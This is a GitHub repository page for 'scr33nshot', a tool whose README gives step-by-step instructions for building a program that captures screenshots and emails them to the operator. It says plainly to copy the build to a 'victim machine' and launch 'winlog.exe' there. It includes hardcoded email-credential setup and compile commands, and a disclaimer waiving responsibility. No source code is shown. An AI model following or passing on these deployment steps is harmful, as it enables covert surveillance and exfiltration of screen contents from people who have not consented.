Skip to content

ryurina/scr33nshot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

DISCLAIMER: We are not responsible of your act by using this tools.

About:

This program take screenshot and send it to your email address

Requirements:

Step 1:

  • Install Python module requirements with the following command
python3 -m pip install -r requirements.txt

Step 2:

  • Open "main.py" and change the following code with your email address and password
    sender = "[email protected]"
    receiver = sender
    password = "youremailpassword"
  • Open "cmd" and compile 'main.py' with the following command:
python3 setup.py build

Step3:

  • Compile "winlog.cpp"

Step4:

  • Copy "winlog.exe" to "\build\exe.win-amd64-3.7"
  • Copy the Folder "build" to your victim machine
  • Launch "winlog.exe" and you should receive screenshot in your mail inbox

PS:

You can improve and modify the code if you want!

Please contact us if you found issues ! Have Fun!

Contact:

twitter : @ryurina23 / @malagasyhacker

DISCLAIMER: We are not responsible of your act by using this tools.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published